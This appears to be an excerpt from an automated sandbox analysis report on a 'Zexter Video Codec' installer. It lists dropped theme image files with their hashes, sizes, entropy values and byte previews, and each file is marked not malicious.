                                                                                                    SSDEEP:24:oq2vym+9kVWUOASjz39hd/9uinkxIyJubx/98nDDJFPyvfCDFHTCyFm+3wTf8f4C:aqmzV9az39z9hnkx+2DfyyD9TFAAwTfI
                                                                                                    MD5:46934D3CAA685BB0DBECF20BAB8BC317
                                                                                                    SHA1:DD61BF668D265AB3FBB61C6CB6CF25778632154F
                                                                                                    SHA-256:AC57AEA1D66661974EA2922733661B27D26D3C2026321E77A2A9ACE1CDAD558C
                                                                                                    SHA-512:BCB6D969F8823196652B4093988719C9F51940890D212A0E743CC887C46BE3DAD00D95B47970F1E682F3A40E7F7216EBFD4B37626AE130FE57F7F3CEBA718AE4
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME.......E......"IDATX.W.J,W....jm.A#>AA$......$....q.....!B.Cp..;1...p((...G=.Vyve...+...>g._....q.:..[__/.--}.....w..X.s.....y...N.EN..9.<koo.smmmknn...!V.b...OOO.8==....'........;;;}...}z..+.....vrr.8<<.........._....755.............r___G[[[+....%...z...\..T*..........Ay|||.........O...w......._utt..D{.T*.......1H..;.Z-......u......?........../....J.......m....F.=D+Rk.....PP.\..Ix....Z?;;.666...}.xW.{Z\...j....c...X1..zm.>..y.!...S.u.....o=l..n..._.f....R..P.."....~..8......l..`.;..B\........>.A...7..Q.F..4..=./.B.......eY..$.<..r....A..$.$.<.`)...........C...V...8.......^.....D&........r..Y9.K.....8..C.....%.UV;*....^. .d.....v. ......M...X..M..zR...H...'..'._dS..P.?..2S.MT......4$.....k...=.eL.^z.....X.e+.......$..sG..qm.vB.........&..I..+W....Q. ,.M.+.-Q..$<!.t....wi.rA..(v.kW..&.p.-.(..u+.j.5.y.....2N.....0....kW....5.y).J1. xDW...x..0.d.p.\S.d......l

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\button-pressed.png (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1555
                                                                                                    Entropy (8bit):7.796645823149652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqhLS0rCCBSazjoXK2RM1EpIuNF0piVLDlZLfciK3ZCHBJW:VjrBBSFXKP1ECuNF0piVLDlBfcOM
                                                                                                    MD5:486390A2CE5B4CC1393AC254780A7C7C
                                                                                                    SHA1:4305181EC1910A666A47C3715D27F5CA6991D688
                                                                                                    SHA-256:AB3BDFDFEED5743FD4AF47B0BA6AAAD914661DCE381A6FF8C8C8994363F83909
                                                                                                    SHA-512:F3F6051BA679C6F329A18E97F12CB6FFD9ED18D0F054C79ED9F2FB5D23F0484A12DB0FD16CD47F52B67E3D617F9BE728F9BECC850CF6A61FE9B74ED9701C2DD1
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME......._......IDATX.WIO#G...+;.Ab.@B$...&...Q.?B2Q...[...8!qEB......bK.....-!..n.....Twlfh.T.v....Wv...eY....Fjiii.R.|..T*.:..a.^.@.U..Z.......~yyy{vv....F.."..NOO....z...S...+....:;;. ...n</....^.xx(_^^.'''.;...mmm..eU...^....011....L.......-...y..Vx...}...A.X,...>..............G....|?99.077.=00.......L&..h._..e..*..U(X....w......w...?.;;;_.........`_www[___..@.Q.H.O..........$,..r.J.P.nnnV..{....{j.....B@..c....!....u....C"P4M.b...V`./<,|.....t...J6...^...H.3..-m.}..5..)..A.0.-Z...!.......V....".:....Y#..z$^H.......eZBa.[..cXd....P:f.P>.&...<....-..v.2..J..DV-.5..i.Z....F....u E.%9...(p....Bpu...Gp...P.]..j.....U..i.!b...*..I.NF(.5.."-.n..L.V.1I.L.D>-..2..Ih..}.J*.`;.......u..*..0..=CC+.P.B.i.@...+..............:1....N%.M<e.....XAUF.W.Sb.M.f.=G...*.be..j.'/...$#.H..0...^......=..u.1s7.B......L....RO.L.Y....T....].Lk..SS..I(..4.Lwf.3N...=...sF#..o9.MK."`...

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-06BDE.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):208
                                                                                                    Entropy (8bit):6.056729441397141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VINtlMv+YftbtCETdkth4EN0QIVp:6v/7uTVI6T6T4ENRI7
                                                                                                    MD5:3DBA17AB50E1923EB74BF395677EFA06
                                                                                                    SHA1:F293297F4127A788E07D365FD4AB5EB19C7383C4
                                                                                                    SHA-256:33BF303743432947AF7E5E4FCFE7A7FF453FCFBFA6ABDC24671071B7C205DA84
                                                                                                    SHA-512:618BFD415108DDB51B7A1D1003D5E40A417BA36F612EF6FBB5F627AE7FDA2388AC2F08F8BFBE5CF6F172DF26737773C902A85FD98DEFB0CD7DE94B3CFF77FAD6
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME.....,"E......]IDAT8.c...?.50.AT5....(1......../%. 9.._.!`19........,....5..a) ^..?)5....@|...F.<.F.h^..A..p..:.j=....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-0GDG9.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.815385299502723
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1Aqg/ml90lvGdw1CwHTQ5NsEZxKG2mpFbp:6v/lhPW/WqgmnBdw1CFNsgdLbp
                                                                                                    MD5:CE4C02BA4708A1AAB1572A9148A94B95
                                                                                                    SHA1:E90673F72B063A610E7383EB7DAFEC7F0BD35549
                                                                                                    SHA-256:6E1332235BB51B2E29B244E5056A6C82015A5FEE79DB2D3A553CD6610DC3BB04
                                                                                                    SHA-512:902C214744235E7CA936D2B16215B63500BA980C00ADFD3773D2EFA65E12FD3EB34DA4F430024BEF2F781F762E4A938778C6AD71AF6D86A9CF02EF53C41E1233
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...PIDAT8.c`......._..........H1.....8....XIu.... ..b+..E.$..(.+. ...( .4.e@x4..G..6.g...t....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-0HTKJ.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):551
                                                                                                    Entropy (8bit):7.319024742694981
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HRd4HSOKRcIzpsbPjUdb4pndLBaXeeFUDqtCmN09:HS2HRd4HSBR5KbPognzadIb
                                                                                                    MD5:731657BF68ECC98F0DBE29095CCB88F7
                                                                                                    SHA1:D3B49C3AD148EC96F3088371715121D32EAA7843
                                                                                                    SHA-256:F95DA774191F393BA0EB0436B4CB22920C5F880ED51010177E6E9189CD36C44A
                                                                                                    SHA-512:DE50FC25578922C8BE31D869B70FC0559C965022D6BCCF71DE6CDD541B424DB67E1AE1032AEBAAE03DF66744A27344194AA7994C9CE84317D1AFD1B437D9AA9E
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....04.k......IDAT(..R.j.Q..}..z.%..h.N..OHa../H.......E>!HPl...F\.+n|f..1.*......9.v.\H.Z.&4M{.u.~>.....w>w....v...)"......"...a....@....n.kN.`.kH.)...K..kY..N.0..#1...=..s...A..0M.\..p%.R...B.b..f3..........."......q.J&...).N.b....5A......@.&.c.!.d...\.Z.Vu..V....."H.xO$...e.HX,....WL.`....F....."...m[bu..c.B.u.u..PB..4...U..._.]..*....KY...l<..a .v..>.s.4.....f#..}0..d2.8A#......*wUU...}.N.?.p=rlJ+.J.n..J#.......7\.R.-.c%....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-1KMJH.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):517
                                                                                                    Entropy (8bit):7.3380534299819
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H4ZZG1CXGrA0JI/88sXEZ1gBxPibGo1+bsI:HS2H4ZGCWXC/tHZ10PiaJP
                                                                                                    MD5:156D5836B29559FD2A8AFACFA2931192
                                                                                                    SHA1:D92B24898B7483591E5B088C60D05B73355AD0EC
                                                                                                    SHA-256:ECE2829963DECBC954FDBC7F831451D36F1248EBDEAAC181B68AEBEC00BE3555
                                                                                                    SHA-512:591CCEED7768A3D6C87A9DC7EE34F9B1A1463AEE30C184027C24294901179BA9C6BFF697FD7004E22F12605D45CB7BC18FFE1C9D7D798A7AB40004FF36FBC656
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....2.........IDAT(S..Ij.Q....v..a..m..(...}...!.&!'.W.=T...mW.....<t..X...$.....E..G...R..;.i>.C.z._...p8|.n...o6.w....r..r9.8..M...h4.....;q...7.M.t.Z.Z-[*..P((.Z.R.......l`.AN.%.LVR..aY.!...@...#......^i4........r...nG..^....f....gd`.~0.9hD,.S.a..>e2.8T......E..t..x.= d..".._@..$...Bq..m=....f..n#.,.t.Z..EW...o.1w1B]p .....0b....w.^'...=.`p:.tD|.d2...i..\..=9......j......<1..._...+."..V|....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-3ALQL.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):220
                                                                                                    Entropy (8bit):6.113077361175645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/CsQH4dKcDA/M+DPu45sC93H5Adp:6v/7ugHcZuK45sC9X5C
                                                                                                    MD5:0BAE3C12DFF85642E6DEBB90607258F0
                                                                                                    SHA1:2B369328373C449DA154FEEC4235464F53AC27FB
                                                                                                    SHA-256:8C41C0E27B9D85D5D49BF44F00A096FA18680E85077FFEB9EC65750F1EFAAA41
                                                                                                    SHA-512:D86BAF78EECDFB96E857D1749BB0580F6230F83D54D4F4843F94EC6335AF339D22560A00907E897A9BB427200305B83056B4649321ABE0C719DDCA89549639D0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....sBIT....|.d.....pHYs...........~.....tEXtSoftware.www.inkscape.org..<....YIDAT8.c...?.50.A.. w v.. ) .....X.\...x...X..#. . ..d./ .&. . >...\.b^R..ze1.^...M... .1.....d.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-4LTJ7.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):593
                                                                                                    Entropy (8bit):7.479894563773081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZzmH9D1hP79P2J2ySk9BvSpqKu6kZPdiaXVygV271:giUpMDrD8J2ySMKIZoaX0gV271
                                                                                                    MD5:FFCCEC64441F01C7AA82069BB8D5E9D9
                                                                                                    SHA1:45C02522F48129065104E1C9B4E6AC63434CC7D9
                                                                                                    SHA-256:B8CEB44936275B37F8D08F71F01F223866CEE50E53182D529A3768514A8C7662
                                                                                                    SHA-512:E8709643F6C4CBAA98F7BF870028664324DE673141F1B9FCE995A03D011C4374817846DCED739B4A3DD37D315A474F739ACAD2933ACA63C67FA0216356B8E608
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(S...n.@.....I#;.X.j...U,.@..x..Bx.D.....W..X.b...Fqq.Z.RED8...3.s..l.H..9s...9:D)..1^..m.........R.@...>.T...97..=..z[......i7Q...<...F...di.......R....]...F...u.......W?41&v.6.O^.%ko.\".qH...)....$..z.NJe{o....."..N....NgXDK.q...y...d.@.q].20.9..(...A.a|~.J..F..$..2pn....$....N.4.2AR.R......`"3..R_....[v.h.n.!...5Gq..QA.Y,.....\..Z....{.h.............mU-..T.Ga..0.{....w..$K..?oN....4KW......'^py.fd..L.)L.z.O(..D..)H...............<....o....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-6NGD6.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195
                                                                                                    Entropy (8bit):6.589496150082679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/YkNWoInpCU14phhk1NWMUGHgyU/Hljp:6v/7uSoIpCUKhhDMUrymlN
                                                                                                    MD5:3043F969482A1E805E6DCA44A6072881
                                                                                                    SHA1:B5764E5B1B26D11737D9307A70E14403E7063A4A
                                                                                                    SHA-256:10A3799ABAABF93F03FD86A23FAFC6C68EB04B5BFB86497F04505DF151E1177E
                                                                                                    SHA-512:3BEAAFABEEF07E3BB7E95DC6C761157C38B9B2B2BDB99C517C073AA137950BFE010C0BDFCC29E955B6A46D6BEED4AB4D8D8D1EF580DD23E8A6B0F471E1FEB4D3
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....IDAT8...?..A...E....F'.j....DG.U$......N.|.....r..k.d.,..$4P.)R..}.F/.h..)...Q..c.%.x.t.8.jc....).......,p.3.i.k...v.F...X....^...Y.........q.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-70MHD.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.807754777184353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1AqgRtKq2HYGHgsG0z4H1iBLq/bp:6v/lhPW/WqoKq24Psjz4H1ipep
                                                                                                    MD5:BDBB9972D9B7265AD10EDB04A9C2E239
                                                                                                    SHA1:DCA1CBFD90B5C644E37DBB6748227E3EB472E0C8
                                                                                                    SHA-256:866FC4117FC8B133D84C9AC96D13A37E99EBF626CEA47F0E8B059B6641FFC7C3
                                                                                                    SHA-512:BA6059567C6EF35161BD3A82D320EFB8E16435EBFF9CA851AC724A58F45726621BCF7F380DBD2A94A29B5DD919FEF294E7440B31F2B2FACC42AAA1968144020D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...PIDAT8.c`......._..)5...#.8..y(1.....\C..8.. .[.TCX.8........b...+@.Abr.Ip....2g..F.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-90NVB.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):333
                                                                                                    Entropy (8bit):6.65458733329839
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSJPwlzkv8z8zKWHCB9mowuVIRmCtIyWDoKby2Fb/67YEFp:6v/7iIGMfbllL5zMKWHCBBIRwyW0KbzG
                                                                                                    MD5:16CE13BC8208F1C0B9422FFAFBC46C6E
                                                                                                    SHA1:FB6B11EE39E0143A056385B25761FCB0E9ED980B
                                                                                                    SHA-256:1EC3BD426CCE1B1BD23664ADCC11FE51D04DE791FADB6A731DE7EB5076B26163
                                                                                                    SHA-512:46EB74547599EED50ED554DCAD5567198D20AAEF7B8D0F2F22E1912224F381F91F5501E4985B007945FC5D4A12B85ED0E06184168F6EE614135C8AFAE13334A5
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME......'.i.h....IDAT(.c`..@VV.WNN.]FF.WJJ.OZZ...............Z...B..Alsss.SSS......,CCC..$.q``.\XX.5N.UUU......pII..N.3g.4....'N.h.S..;U.]+..hXf...j85>~....+j.O..>~..$......8s..+....?..?..{'...{./_.H.}.y..0.15c..B......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-C8DLE.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1128
                                                                                                    Entropy (8bit):7.702657785044095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:CiUpjur3mHiYuZssTwiTn7JgcOc/irhx1F613aC8BLZ2cL/Fsc:CNpj23hnNTwiTPzU6t+JI4FN
                                                                                                    MD5:3F6A543B6C75ACB2EE000A3BAC7B9A59
                                                                                                    SHA1:A53275A9B4F65393301A1C787B67E87FFDA8234F
                                                                                                    SHA-256:3FACB849498CFA7CCF96BF7B02C5792C0DC49374EA7DDDC8F78E7ED53A96C72B
                                                                                                    SHA-512:E9E98AFF394E4ADAEA3C79096BD8DC865EF539D67F9E3030FEB7F4FACAACC1278606592228A19733AF99128966530CEC1363E9C6DAB6C555DFC0D8C7ADB51517
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDATX..=SSA...........G.+F....._daaaa..a.....JG+.... 7$ww=g.ws..A/n.~.>.y..+}......=%.Tn..m.....Bt.....N..'.....Z.'...........;....[.d.....~.....9.LI.?>W.........It.W..m...N...x&8>.....}....0....JoU,<X$G..m..YV......w..L...:n..FJ..!......."|.......C)........)p...)F....[.Y..{..jZ@.j.s5xv.W.|L&./.^.u..y....h..4.9b..}$..q.....".....{..p..9;.s..Ul.............^......p...d+.....u......tZ...B......d..Z.....q.....'H.}...g.jl....~a.ng...m.....mw.fp..0....,MI..v.W..7........l8.s.K..*.2....qB..|:.\[...Nje...!..L.^q.Z.hU..f..35s..hK.......R.. $.-..:.......7.p6N.i.+.....u..!RE8..L&...U+...s.x.O.s.H.U.R.E..>z.".......".DB.....9F.......h...W.<.....KH.DO.}.q.!.*....<8.c.J...A.|.S..}.d..ZL......vh....<.#.......W.i..+...m....p...8..Q......A....7..f.sk=.....!.%........tY...S.+...t.Y....1.97P!..a....a.%.m9[~I..K.?..tB.v.L&.[-.h...D...J'......Q'4...59.......I.s..

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-D1BLN.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):69
                                                                                                    Entropy (8bit):4.258998795700668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlv5hrl6hJbF/k3ollkup:6v/lhPZcJq4ldp
                                                                                                    MD5:A7204A9D9C26A12DD3C0B069EFD8ACAC
                                                                                                    SHA1:5E1E54C75D7D83147DD57DCCBCC5302D1798B21E
                                                                                                    SHA-256:FA56F736618C032485F27BA183FF0D5226006E2080CF20813AF1C6A7B93F4AA3
                                                                                                    SHA-512:7401056BE66AE9CDAF9EFEF6DBA0F96384964DA491F538C35C283419EE819F767D6BFC601E2FEF8445FA25A447A5550C6CD8986330329981B852940EC334F08F
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.....................IDAT..c..`.......%......IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-FUEGS.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):549
                                                                                                    Entropy (8bit):7.372873904443628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H0ZF0NS5rNgZK5S80iwpLboX30XuQBMBVEB5Hk:HS2H/NS17A8v1X3wuxYY
                                                                                                    MD5:FA26AC420BEA517A2C4247572E33842E
                                                                                                    SHA1:06DE61402AAA1A2ADC2EF2969E76B7200A9D13AA
                                                                                                    SHA-256:8D8451A732FA6662F6FCE32CCF6751E421C6FFC7C5B819C29AB1482967B05FFA
                                                                                                    SHA-512:8850CFCD06A82FA41D4B30F88DE5485857B2BD1B548CEC4A7F38B78E3427AEDA01B44762161D8352501F6AE0EBBAEE82AF71F52296CCB93399B4C01C6864D382
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0.[.......IDAT(.mR.j.@........(.".."~C.n...Q.!...n.u.O.).+A.*..&>{..)..\2s.{....z...m..W.T.r.<0.....po.. 0X..Az..3....J....L.S..f.r..P....."I.T..hx.fS...../.lV.(..z-.~_..qx>..HV....b..J%Z...@.........e.X.A.%....LFN..&1.&..X.......l.,.T..@....m]`...j...b.s ...c.Z+.N.$..R.@.i..s.H.-....).0W`....I..D.x/xF7.(>.~..LuCf.L$..a...`.}...q....=5.! ..r.........I...6..8.]rnF...j...j5..-...|>....$@.nG.9. .":..!...x<....._.....`7....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-H6TUL.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:GIMP XCF image data, version 0, 32 x 32, RGB Color
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3977
                                                                                                    Entropy (8bit):5.413488066014333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7dsNCv/C/CVGhkFTKfyeeocjI4Dc8oPjZ/narUX0Zwnc1ZHHdOkdsFVpAa:KcQ2Gyejc0QoPjZ/KKgwniLsFVpAa
                                                                                                    MD5:1339E8669A986ACB3CCA794EF7E67ABB
                                                                                                    SHA1:8295D74B144481F86B928D0C9A2F16AE0FF86F7C
                                                                                                    SHA-256:4D58C67A4095BE33201E16C2545B28DEF1CBA2D7690F0540877866CFC7ACE230
                                                                                                    SHA-512:DF9AA421947EF90713D0F9D2648803DDC975DB7FDB67F2941A9CA7FD489C9734081FE085C4ED4335C798A05CE2028D84C22A4948C558FDCBE86593CFEBB6A796
                                                                                                    Malicious:false
                                                                                                    Preview:gimp xcf file.... ... .....................B...B..............?........................gimp-image-grid.........(style solid).(fgcolor (color-rgba 0.000000 0.000000 0.000000 1.000000)).(bgcolor (color-rgba 1.000000 1.000000 1.000000 1.000000)).(xspacing 10.000000).(yspacing 10.000000).(spacing-unit inches).(xoffset 0.000000).(yoffset 0.000000).(offset-unit inches).................................5........... ... ........New Layer............l...............................................................................................................+...........=....... ... .......Q....... ... ...a....E...............................#.E...............................#.E...............................#.E.............Vq.q.W......?......?......8......8..............#.... ... ........New Layer#4............................................................................................................................'................... ... ............... ... .........................."..

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-HG82J.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):324
                                                                                                    Entropy (8bit):6.776590990847706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSP7k0Rt64huUPOfsIuDRWi9I1z2He4hsCvJgVm/kup:6v/7iIGMfbll8g0RciuU2fy9I1zg3lJP
                                                                                                    MD5:389BCEA15865028B56A0A70C87E13DCA
                                                                                                    SHA1:B771E6A3E73B2B3E4B440B2E59D98E9D7F3B60C7
                                                                                                    SHA-256:5CAA4636ADE7C9B36E257D1AB01D06FDA59310781F4C1E5B527342D5DD8B8DE3
                                                                                                    SHA-512:BDD82387E62B1726B402B1BE8B87CD2BF02C794A77525E4780A96DAE71E6CBF5F17261706A161A7AE1FDB8F15542DD2A3046ABE0A3328B5139C99F9F9CDDDFA3
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME......*........IDAT(.....0....Uh..C#`....&._...p%..qs.....H...K:....E.S...u....TU.+.R5M..B.m..y.._... ..Zk9M.`.}*.>..C..8.:..I...8.....a.v.......h.b..A....n.T...C...c.%...G..i.2J.+.J)GB...wY......:...,.D.Y?..F..Z.....IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-JQVI3.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):559
                                                                                                    Entropy (8bit):7.393060209024772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H1ClNHN+5CWPctjcNirsMD0YrO5kOBMlz:HS2HkHeCmPGxbibO9
                                                                                                    MD5:C720EFDABF3F8B47BD07FCFE80AF5608
                                                                                                    SHA1:A63400832DC55C911113C0176DA2EE6DF04F5D4F
                                                                                                    SHA-256:C81909BB15E1417A075DB27E1FA348C9371F68BF55B434FC70FB28FD5AED37AD
                                                                                                    SHA-512:1EF5ADCDE29FC4316DB7292D53741C3330BF17203B24EFDB6D1112413763FE37822BBDD9008B0C0E7A2210FA519D56922CB574C23043A12954FEF9ECDCBF382D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0..a......IDAT(.U..j.A.....#.B.B...H!.Jc..". !u.@.&.E .`X.Pl....].s....\f...=g..\.b.z..,.j:.S;.N.<.>.....N..4....=...f.*..{.BA<..t*..$..f.........r]..Z..*....iI&....H............J...@A.X,>@I.....q..b..T.Vu...._,./.v....3...}_'...Q]...H;a....T*.c..n.m1...g..J..#J)..\\>....#.C..D.3...d\.^^....q%hlse.....~..L.f.L.LaZ..g.Jw...n....y.......>....M1.I4.. ...@...A.1... . |.lV..[C.A.n.P.U*.T.\.r.... ..8..FK...#w;..y.r...]...............IEND.B`.

                                                                                                    C:\Users\user\AppData\Local\Zexter Video Codec\themes\gray_textured\is-K33SB.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):437
                                                                                                    Entropy (8bit):7.172409807946269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllRNTwF4Aca6vxsbrVnsgP7F9J6Jz17:HSbHRhwF4A56vuZ/Z6t17
                                                                                                    MD5:E51360FDC759C15DEF4ED591275F6E37
                                                                                                    SHA1:723E725BAB93316AA5CBEEAF65A782777DD28983
                                                                                                    SHA-256:559FD805D661B05A7B67119EF93067D6BF076D5A92470F343332D80EB6C67168
                                                                                                    SHA-512:8BE34022F9188993A642A10A31D3AA05865254C69134726F5C1891E6537AF94A6E625D63A6E8D3C058A10E49A60D03C407AD8D6D70F09452D91957680D99E115
                                                                                                    Malicious:false
